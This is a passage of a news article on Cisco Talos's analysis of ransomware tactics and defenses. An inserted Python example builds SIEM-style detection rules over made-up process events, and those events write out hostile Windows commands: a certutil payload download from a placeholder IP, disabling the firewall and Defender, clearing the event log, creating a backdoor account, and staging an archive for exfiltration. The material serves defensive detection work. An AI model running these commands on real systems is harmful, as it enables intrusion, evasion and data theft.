Cisco Talos analyzes attack chains, network ransomware tactics

Last updated: July 11, 2024 9:59 pm
Published July 11, 2024
“To avoid detection, ransomware actors employ ‘defense evasion techniques’ such as disabling or modifying security software, including anti-virus programs and endpoint detection solutions. They also often try to disable security features in the operating system to prevent the detection of the ransomware payload,” Nutland wrote. “Adversaries will also often obfuscate malicious software by packing and compressing the code, eventually unpacking itself in memory when executed. They can also modify the system registry to disable security alerts, configure the software to execute at startup, or block certain recovery options for users.”

Talos noted a number of additional ransomware characteristics, including:

  • MFA exploits: “Adversaries may send emails containing malicious attachments or URL links that will execute malicious code on the target system, deploying the actors’ tools and malware, and exploiting multi-factor authentication (MFA). There are many ways adversaries hope to bypass MFA, whether because of poor implementation or because they already have valid account credentials. Most notably, we have seen an increasing number of ransomware affiliates attempting to exploit vulnerabilities or misconfigurations in internet-facing systems, such as in legacy or unpatched software.”
  • Seeking long-term access: “…actors will look to establish long-term access, ensuring that their operations will be successful even if their initial intrusion is discovered and remediated. Attackers often use automated malware persistence mechanisms, such as AutoStart execution upon system boot, or modify registry entries. Remote access software tools can also be deployed, and local, domain and/or cloud accounts created, to establish secondary credentialed access.”
  • Enumerating target environments: “Upon establishing persistent access, threat actors will then attempt to enumerate the target environment to understand the network’s structure, locate resources that can support the attack, and identify data of value that can be stolen in double extortion. Using various native utilities and legitimate services, they exploit weak access controls and elevate privileges to the administrator level to progress further along the attack chain.”
  • Using network scanner utilities: “We have observed the popular use of many network scanner utilities in addition to native operating system tools and utilities (living-off-the-land binaries) like Certutil, Wevtutil, Net, Nltest and Netsh to blend in with typical operating system functions, exploit trusted applications and processes, and aid in malware delivery.”
  • Double extortion: “In the shifting focus to a double extortion model, many adversaries collect sensitive or confidential information to send to an external adversary-controlled resource or over some C2 mechanism. File compression and encryption utilities WinRAR and 7-Zip have been used to conceal files for the unauthorized transfer of data, while adversaries often exfiltrate files using the previously mentioned legitimate RMM tools. Custom data exfiltration tools have been developed and used by the more mature RaaS operations, offering custom tooling such as Exbyte (BlackByte) and StealBit (LockBit) to facilitate data theft.”
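The living-off-the-land binaries, registry persistence, log clearing and archive staging described in the items above are exactly what a SIEM or EDR rule would key on. What follows is an added example, not code from Talos or from the original article: a small Python rule set run over constructed Sysmon-style process-creation records (the hostnames, users, address and command lines are made up for illustration), which tags each matching event with an ATT&CK-style tactic label and then correlates per host. A single certutil or netsh invocation is weak evidence on its own; several distinct tactics on one host is the chain Talos describes and is what should be escalated. The rules anchor on the verb (`reg add`, `net user … /add`) so that routine queries with the same binaries stay quiet.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon Event ID 1 (process creation) style records, for illustration only.
# Hostnames, users, the address and the paths are made up; nothing here is real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\\Users\\Public\\p.exe"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\p.exe"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\nltest.exe",
     "cmdline": "nltest /dclist:corp"},
    {"host": "FS02", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "FS02", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"},
    {"host": "FS02", "user": "CORP\\svc_backup", "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmdline": "7z.exe a -pHunter2 C:\\Windows\\Temp\\fin.7z D:\\Finance\\"},
    {"host": "FS02", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net user helpdesk Summer2024! /add"},
    # Ordinary admin activity on a third host: the same binaries with benign arguments.
    {"host": "WS05", "user": "CORP\\mmiller", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net use Z: \\\\fs02\\share /persistent:no"},
    {"host": "WS05", "user": "CORP\\mmiller", "image": "C:\\Windows\\System32\\netsh.exe",
     "cmdline": "netsh interface show interface"},
    {"host": "WS05", "user": "CORP\\mmiller", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"},
]


@dataclass(frozen=True)
class Rule:
    name: str
    tactic: str      # ATT&CK tactic label assigned here for illustration
    images: tuple    # lowercase basenames of the binaries the rule applies to
    pattern: str     # regex matched against the lowercased command line


# One rule per behaviour named in the Talos write-up; each is gated on the binary AND
# on the verb/switch, so "reg query" or "net use" do not fire.
RULES = (
    Rule("certutil download or decode", "Command and Control", ("certutil.exe",),
         r"-(urlcache|decode|encode)\b"),
    Rule("Windows event log cleared", "Defense Evasion", ("wevtutil.exe",),
         r"^wevtutil(\.exe)?\s+cl\b"),
    Rule("host firewall disabled", "Defense Evasion", ("netsh.exe",),
         r"advfirewall\s+set\s+\w+\s+state\s+off"),
    Rule("Defender disabled via policy key", "Defense Evasion", ("reg.exe",),
         r"^reg(\.exe)?\s+add\b.*windows defender.*(disableantispyware|disablerealtimemonitoring)"),
    Rule("Run-key persistence", "Persistence", ("reg.exe",),
         r"^reg(\.exe)?\s+add\b.*\\currentversion\\run(once)?\b"),
    Rule("local account created", "Persistence", ("net.exe", "net1.exe"),
         r"^net1?(\.exe)?\s+user\b.*\s/add\b"),
    Rule("domain controller/trust enumeration", "Discovery", ("nltest.exe",),
         r"/(dclist|domain_trusts|trusted_domains)\b"),
    Rule("archive staged for exfiltration", "Collection", ("7z.exe", "rar.exe", "winrar.exe"),
         r"^\S+\s+a\s"),
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events, rules=RULES):
    """Return one finding dict per (event, matching rule) pair."""
    findings = []
    for ev in events:
        image = _basename(ev["image"])
        cmd = ev["cmdline"].lower()
        for rule in rules:
            if image in rule.images and re.search(rule.pattern, cmd):
                findings.append({"host": ev["host"], "user": ev["user"], "rule": rule.name,
                                 "tactic": rule.tactic, "cmdline": ev["cmdline"]})
    return findings


def correlate(findings, min_tactics=2):
    """Hosts whose findings span at least min_tactics distinct tactics, with the sorted tactic list."""
    tactics_by_host = {}
    for f in findings:
        tactics_by_host.setdefault(f["host"], set()).add(f["tactic"])
    return {host: sorted(t) for host, t in tactics_by_host.items() if len(t) >= min_tactics}


if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['host']:5} {h['tactic']:19} {h['rule']:38} {h['cmdline']}")
    for host, tactics in correlate(hits).items():
        print(f"ESCALATE {host}: {', '.join(tactics)}")
```

On the sample data WS01 accumulates four tactics (ingress tool transfer, firewall tamper, Run-key persistence, DC enumeration) and FS02 three (log clearing plus Defender tamper, an account added, a password-protected archive staged for exfiltration), while the admin workstation WS05 produces no findings. In production the same rules would read from the SIEM's process-creation feed rather than an inline list, and the correlation would be bounded by a time window.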

Earlier this year Talos wrote that bad actors perpetrating advanced persistent threat (APT) attacks aren’t just looking to access your network. They want to sneak in and hang around to collect valuable data or lay plans for future attacks. Post-compromise threats are growing, and they are aimed largely at aging network infrastructure and edge devices that are well past end-of-life and may have critical unpatched vulnerabilities.

Some of the things businesses can do to combat ransomware attacks include regularly and consistently applying patches and updates to all systems and software to address vulnerabilities promptly and reduce the risk of exploitation, according to Nutland. “Implement strong password policies that require complex, unique passwords for each account. Additionally, implement multi-factor authentication (MFA) to add an extra layer of security,” Nutland stated.

Nutland also recommends segmenting the network to isolate sensitive data and systems, preventing lateral movement in case of a breach, and using network access control mechanisms such as 802.1X to authenticate devices before granting network access, ensuring only authorized devices connect.

“Implement a Security Information and Event Management (SIEM) system to continuously monitor and analyze security events, in addition to the deployment of EDR/XDR solutions on all clients and servers to provide advanced threat detection, investigation, and response capabilities,” Nutland wrote.
